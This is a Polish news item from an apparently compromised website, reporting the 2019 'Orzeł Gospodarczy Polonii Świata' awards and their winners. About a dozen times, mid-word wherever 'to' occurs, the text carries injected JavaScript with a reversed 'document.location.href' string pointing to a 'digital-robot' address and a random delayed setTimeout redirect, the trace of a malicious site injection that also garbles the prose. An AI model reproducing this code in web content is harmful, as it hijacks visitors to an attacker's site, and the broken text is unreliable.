< powrót do aktualności

Orły gospodarcze Polonii Świata 2019 rozdane

W trakcie Gali Biznesu tradycyjnie tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}towarzyszącej Forum Gospodarczemu Polonii Świata przyznawane są co roku prestiżowe nagrody „Orzeł Gospodarczy Polonii Świata” w trzech kategoriach: osobowość, organizacja i firma.

Beneficjentami nagród i wyróżnień są osoby, instytucje, organizacje i firmy, które w sposób szczególny zdobyły uznanie Polonii, bądź zasłużyły swoją działalnością i postawą w obszarze kultywowania dziedzictwa narodowego, zachowania polskiej tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tożsamości oraz kreowania pozytywnego wizerunku Marki Polska w Świecie oraz promocji gospodarczej polski, na przyznanie tej prestiżowej nagrody.

W tegorocznej edycji „Orzeł Gospodarczy Polonii Świata 2019” nagrody otrzymali:
– KATEGORIA ORGANIZACJA: „SOCIETY of POLISH AMERICAN TRAVEL AGENTS” – za ustawiczną promocję Polski, polskiej turystyki, kultury i histobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torii oraz polskiego stylu prowadzenia zintegrowanego biznesu w ramach stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}towarzyszonych firm i przedsiębiorców.
– KATEGORIA OSOBOWOŚĆ: Zbigniew Ludger Olszewski – Prezes Fundacji Polonia Gospodarcza Świata- za dotychczasową, wieloletnią działalność na rzecz integracji Polonii z Polskimi przedsiębiorstwami, upór, cierpliwość oraz zaangażowanie w proces łączenia polskich przedsiębiorców z ich z polonijnymi partnerami.
– KATEGORIA FIRMA: INDEPENDENT FILM FACTORY, Inc. – za wyjątkowy wkład w promocje Polski na Świecie, w szczególności za ostatni projekt o wyjątkowej skali: produkcji 13-odcinkowego serialu culinary travel “Flavor of Poland” dla amerykańskiej telewizji publicznej PBS. Poprzez film oraz sztuki audiowizualne firma IFF przybliża Amerykanom obraz Polski, jej piękno, tradycje, histobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torię, zabytki, nowoczesność oraz związki polsko-amerykańsko-kanadyjskie na przestrzeni wielu wieków, prezentuje sylwetki wybitnych Polaków i Amerykanów polskiego pochodzenia, którzy mieli ogromny wpływ na oba kraje.

W trakcie Gali Biznesu przyznano dodatkowo dwie nagrody specjalne dla:
– Polski Kanał Telewizyjny TVP POLONIA – za tworzenie pozytywnego wizerunku Polski i Polaków w Świecie, sprawowanie wyjątkowej misji edukacyjnej, kultywowanie dziedzictwa i zachowania polskiej tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tożsamości, histobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torii, a także promocji gospodarczej i wspieranie Polskich przedsiębiorców prowadzących działalność pod każdą szerokością geograficzną. Dzięki przekazowi satelitarnemu, a przede wszystkim pracy redaktobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torów, dziennikarzy, techników i operatobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torów program dociera do Polonii na wszystkich kontynentach.
– BIURO POLONIJNE przy KANCELARII SENATU – za trudną, mozolną codzienną pracę, której nie widać na zewnątrz, a ze szczególnym i wyjątkowym poczuciem obowiązku i spełnienia misji przyjmuje na co dzień setki listów, maili, telefonów z różnymi problemami z jakimi spotykają się organizacje polonijne, w tym organizacje otobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toczenia biznesu. Biuro przyjęło powinność utrzymywania więzi z Polakami zamieszkałymi poza granicami Kraju, wzmacnianie pozycji środowisk polskich i polonijnych w krajach zamieszkania oraz wspieranie wszelkich działań w zakresie kultury i promocji Polski, a także ochrony dziedzictwa kulturowego i histobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torycznego.